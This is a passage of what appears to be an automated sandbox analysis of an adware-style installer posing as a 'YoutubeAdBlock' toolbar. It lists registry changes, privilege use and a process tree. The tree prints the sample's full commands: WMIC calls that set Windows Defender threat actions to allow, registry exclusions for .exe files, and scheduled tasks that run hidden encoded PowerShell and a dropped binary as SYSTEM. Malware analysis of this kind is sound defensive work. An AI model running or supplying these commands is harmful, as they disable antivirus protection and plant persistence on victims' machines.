Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\TypeLib\Version = "1.0"	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ThreadingModel = "Apartment"	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{FA7B2EB3-B9D9-4CF7-9525-78D069C142B7}\LocalServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\lmIJiod.exe"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_YtazTUhZpmGFMeosxGoStrqXzW"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ProgID = "Toolbar.ExtensionHelperObject.1"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\0\win32	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ = "IyFOGQOPsSrjKINQhDMF"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\TypeLib\Version = "1.0"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Programmable\	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\lmIJiod.exe"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\FLAGS\ = "0"	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}\1.0\HELPDIR	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\ = "{FB291A6A-0C06-4AC8-A4EF-C56051B9DBFE}"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\ = "muVCVUSRFKgBfVwebaH[()(_mNyf{gjxSdMF"	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\HELPDIR	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ = "_YtazTUhZpmGFMeosxGoStrqXzW"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{0A295B43-A0FB-45C6-9F08-7A7D2FCCA175}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\InprocServer32\ = "C:\\Program Files (x86)\\WSPNEpLqQIE\\ktTXGKPDP.dll"	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\ = "YoutubeAdBlock"	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1A4355C3-1380-4565-8F0B-AE992134C31B}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{34B9BF3D-82C3-4751-AC73-F5B1CE3A5956}\1.0\0\win32	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{69B17FBB-AC1E-4F2F-A486-D6A4606A6C36}\ProxyStubClsid32	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\ProxyStubClsid32	uHnQBsa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib	uHnQBsa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{601F87D8-13CD-4AEA-83DA-960D9654B38D}\TypeLib\Version = "1.0"	uHnQBsa.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exeuHnQBsa.exe

pid	process
3032	powershell.exe
3032	powershell.exe
3032	powershell.exe
1872	powershell.exe
1872	powershell.exe
1872	powershell.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
4592	powershell.EXE
4592	powershell.EXE
4592	powershell.EXE
1280	powershell.exe
1280	powershell.exe
1280	powershell.exe
1776	powershell.exe
1776	powershell.exe
1776	powershell.exe
3180	powershell.exe
3180	powershell.exe
3180	powershell.exe
4380	powershell.exe
4380	powershell.exe
4380	powershell.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
1420	powershell.EXE
1420	powershell.EXE
1420	powershell.EXE
1760	powershell.exe
1760	powershell.exe
1760	powershell.exe
4624	powershell.exe
4624	powershell.exe
4624	powershell.exe
1300	powershell.exe
1300	powershell.exe
1300	powershell.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe
3060	uHnQBsa.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3032	powershell.exe
Token: SeIncreaseQuotaPrivilege	3344	WMIC.exe
Token: SeSecurityPrivilege	3344	WMIC.exe
Token: SeTakeOwnershipPrivilege	3344	WMIC.exe
Token: SeLoadDriverPrivilege	3344	WMIC.exe
Token: SeSystemProfilePrivilege	3344	WMIC.exe
Token: SeSystemtimePrivilege	3344	WMIC.exe
Token: SeProfSingleProcessPrivilege	3344	WMIC.exe
Token: SeIncBasePriorityPrivilege	3344	WMIC.exe
Token: SeCreatePagefilePrivilege	3344	WMIC.exe
Token: SeBackupPrivilege	3344	WMIC.exe
Token: SeRestorePrivilege	3344	WMIC.exe
Token: SeShutdownPrivilege	3344	WMIC.exe
Token: SeDebugPrivilege	3344	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3344	WMIC.exe
Token: SeRemoteShutdownPrivilege	3344	WMIC.exe
Token: SeUndockPrivilege	3344	WMIC.exe
Token: SeManageVolumePrivilege	3344	WMIC.exe
Token: 33	3344	WMIC.exe
Token: 34	3344	WMIC.exe
Token: 35	3344	WMIC.exe
Token: 36	3344	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3344	WMIC.exe
Token: SeSecurityPrivilege	3344	WMIC.exe
Token: SeTakeOwnershipPrivilege	3344	WMIC.exe
Token: SeLoadDriverPrivilege	3344	WMIC.exe
Token: SeSystemProfilePrivilege	3344	WMIC.exe
Token: SeSystemtimePrivilege	3344	WMIC.exe
Token: SeProfSingleProcessPrivilege	3344	WMIC.exe
Token: SeIncBasePriorityPrivilege	3344	WMIC.exe
Token: SeCreatePagefilePrivilege	3344	WMIC.exe
Token: SeBackupPrivilege	3344	WMIC.exe
Token: SeRestorePrivilege	3344	WMIC.exe
Token: SeShutdownPrivilege	3344	WMIC.exe
Token: SeDebugPrivilege	3344	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3344	WMIC.exe
Token: SeRemoteShutdownPrivilege	3344	WMIC.exe
Token: SeUndockPrivilege	3344	WMIC.exe
Token: SeManageVolumePrivilege	3344	WMIC.exe
Token: 33	3344	WMIC.exe
Token: 34	3344	WMIC.exe
Token: 35	3344	WMIC.exe
Token: 36	3344	WMIC.exe
Token: SeDebugPrivilege	1872	powershell.exe
Token: SeIncreaseQuotaPrivilege	2872	WMIC.exe
Token: SeSecurityPrivilege	2872	WMIC.exe
Token: SeTakeOwnershipPrivilege	2872	WMIC.exe
Token: SeLoadDriverPrivilege	2872	WMIC.exe
Token: SeSystemProfilePrivilege	2872	WMIC.exe
Token: SeSystemtimePrivilege	2872	WMIC.exe
Token: SeProfSingleProcessPrivilege	2872	WMIC.exe
Token: SeIncBasePriorityPrivilege	2872	WMIC.exe
Token: SeCreatePagefilePrivilege	2872	WMIC.exe
Token: SeBackupPrivilege	2872	WMIC.exe
Token: SeRestorePrivilege	2872	WMIC.exe
Token: SeShutdownPrivilege	2872	WMIC.exe
Token: SeDebugPrivilege	2872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2872	WMIC.exe
Token: SeRemoteShutdownPrivilege	2872	WMIC.exe
Token: SeUndockPrivilege	2872	WMIC.exe
Token: SeManageVolumePrivilege	2872	WMIC.exe
Token: 33	2872	WMIC.exe
Token: 34	2872	WMIC.exe
Token: 35	2872	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d0a450955b5c37142aa1fca3f2631a77.exeSimplInst.exeSimplInst.execmd.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exeforfiles.execmd.exepowershell.exeforfiles.execmd.exepowershell.exepowershell.EXE

description	pid	process	target process
PID 4648 wrote to memory of 5100	4648	d0a450955b5c37142aa1fca3f2631a77.exe	SimplInst.exe
PID 4648 wrote to memory of 5100	4648	d0a450955b5c37142aa1fca3f2631a77.exe	SimplInst.exe
PID 4648 wrote to memory of 5100	4648	d0a450955b5c37142aa1fca3f2631a77.exe	SimplInst.exe
PID 5100 wrote to memory of 3440	5100	SimplInst.exe	SimplInst.exe
PID 5100 wrote to memory of 3440	5100	SimplInst.exe	SimplInst.exe
PID 5100 wrote to memory of 3440	5100	SimplInst.exe	SimplInst.exe
PID 3440 wrote to memory of 60	3440	SimplInst.exe	cmd.exe
PID 3440 wrote to memory of 60	3440	SimplInst.exe	cmd.exe
PID 3440 wrote to memory of 60	3440	SimplInst.exe	cmd.exe
PID 60 wrote to memory of 3224	60	cmd.exe	forfiles.exe
PID 60 wrote to memory of 3224	60	cmd.exe	forfiles.exe
PID 60 wrote to memory of 3224	60	cmd.exe	forfiles.exe
PID 3224 wrote to memory of 4272	3224	forfiles.exe	cmd.exe
PID 3224 wrote to memory of 4272	3224	forfiles.exe	cmd.exe
PID 3224 wrote to memory of 4272	3224	forfiles.exe	cmd.exe
PID 4272 wrote to memory of 3032	4272	cmd.exe	powershell.exe
PID 4272 wrote to memory of 3032	4272	cmd.exe	powershell.exe
PID 4272 wrote to memory of 3032	4272	cmd.exe	powershell.exe
PID 3032 wrote to memory of 3344	3032	powershell.exe	WMIC.exe
PID 3032 wrote to memory of 3344	3032	powershell.exe	WMIC.exe
PID 3032 wrote to memory of 3344	3032	powershell.exe	WMIC.exe
PID 3440 wrote to memory of 632	3440	SimplInst.exe	forfiles.exe
PID 3440 wrote to memory of 632	3440	SimplInst.exe	forfiles.exe
PID 3440 wrote to memory of 632	3440	SimplInst.exe	forfiles.exe
PID 632 wrote to memory of 1068	632	forfiles.exe	cmd.exe
PID 632 wrote to memory of 1068	632	forfiles.exe	cmd.exe
PID 632 wrote to memory of 1068	632	forfiles.exe	cmd.exe
PID 1068 wrote to memory of 1108	1068	cmd.exe	reg.exe
PID 1068 wrote to memory of 1108	1068	cmd.exe	reg.exe
PID 1068 wrote to memory of 1108	1068	cmd.exe	reg.exe
PID 1068 wrote to memory of 1220	1068	cmd.exe	reg.exe
PID 1068 wrote to memory of 1220	1068	cmd.exe	reg.exe
PID 1068 wrote to memory of 1220	1068	cmd.exe	reg.exe
PID 60 wrote to memory of 1752	60	cmd.exe	forfiles.exe
PID 60 wrote to memory of 1752	60	cmd.exe	forfiles.exe
PID 60 wrote to memory of 1752	60	cmd.exe	forfiles.exe
PID 1752 wrote to memory of 1764	1752	forfiles.exe	cmd.exe
PID 1752 wrote to memory of 1764	1752	forfiles.exe	cmd.exe
PID 1752 wrote to memory of 1764	1752	forfiles.exe	cmd.exe
PID 1764 wrote to memory of 1872	1764	cmd.exe	powershell.exe
PID 1764 wrote to memory of 1872	1764	cmd.exe	powershell.exe
PID 1764 wrote to memory of 1872	1764	cmd.exe	powershell.exe
PID 1872 wrote to memory of 2872	1872	powershell.exe	WMIC.exe
PID 1872 wrote to memory of 2872	1872	powershell.exe	WMIC.exe
PID 1872 wrote to memory of 2872	1872	powershell.exe	WMIC.exe
PID 60 wrote to memory of 3848	60	cmd.exe	forfiles.exe
PID 60 wrote to memory of 3848	60	cmd.exe	forfiles.exe
PID 60 wrote to memory of 3848	60	cmd.exe	forfiles.exe
PID 3848 wrote to memory of 4052	3848	forfiles.exe	cmd.exe
PID 3848 wrote to memory of 4052	3848	forfiles.exe	cmd.exe
PID 3848 wrote to memory of 4052	3848	forfiles.exe	cmd.exe
PID 4052 wrote to memory of 4060	4052	cmd.exe	powershell.exe
PID 4052 wrote to memory of 4060	4052	cmd.exe	powershell.exe
PID 4052 wrote to memory of 4060	4052	cmd.exe	powershell.exe
PID 3440 wrote to memory of 4332	3440	SimplInst.exe	schtasks.exe
PID 3440 wrote to memory of 4332	3440	SimplInst.exe	schtasks.exe
PID 3440 wrote to memory of 4332	3440	SimplInst.exe	schtasks.exe
PID 4060 wrote to memory of 4424	4060	powershell.exe	WMIC.exe
PID 4060 wrote to memory of 4424	4060	powershell.exe	WMIC.exe
PID 4060 wrote to memory of 4424	4060	powershell.exe	WMIC.exe
PID 3440 wrote to memory of 4408	3440	SimplInst.exe	schtasks.exe
PID 3440 wrote to memory of 4408	3440	SimplInst.exe	schtasks.exe
PID 3440 wrote to memory of 4408	3440	SimplInst.exe	schtasks.exe
PID 4592 wrote to memory of 3160	4592	powershell.EXE	gpupdate.exe

C:\Users\Admin\AppData\Local\Temp\d0a450955b5c37142aa1fca3f2631a77.exe
"C:\Users\Admin\AppData\Local\Temp\d0a450955b5c37142aa1fca3f2631a77.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4648

C:\Users\Admin\AppData\Local\Temp\7zS65A5.tmp\SimplInst.exe
.\SimplInst.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5100

C:\Users\Admin\AppData\Local\Temp\7zS6680.tmp\SimplInst.exe
.\SimplInst.exe /S /site_id=767
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3440

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
4⤵
- Suspicious use of WriteProcessMemory
PID:60

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:3224

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3032

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3344

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:1764

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1872

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2872

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
5⤵
- Suspicious use of WriteProcessMemory
PID:3848

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
- Suspicious use of WriteProcessMemory
PID:4052

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4060

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
8⤵
PID:4424

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
4⤵
- Suspicious use of WriteProcessMemory
PID:632

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
5⤵
- Suspicious use of WriteProcessMemory
PID:1068

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
6⤵
PID:1108

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
6⤵
PID:1220

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gIWGwrimX" /SC once /ST 01:14:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
4⤵
- Creates scheduled task(s)
PID:4332

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gIWGwrimX"
4⤵
PID:4408

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gIWGwrimX"
4⤵
PID:3028

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bqZkKdgiyjBiVwZYfn" /SC once /ST 10:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\FyAWIxc.exe\" nv /site_id 767 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4592

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:3160

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4528

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4836

C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\FyAWIxc.exe
C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\mMKUVlbKUxrhtsQ\FyAWIxc.exe nv /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:4104

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:648

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1280

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:412

C:\Windows\SysWOW64\forfiles.exe
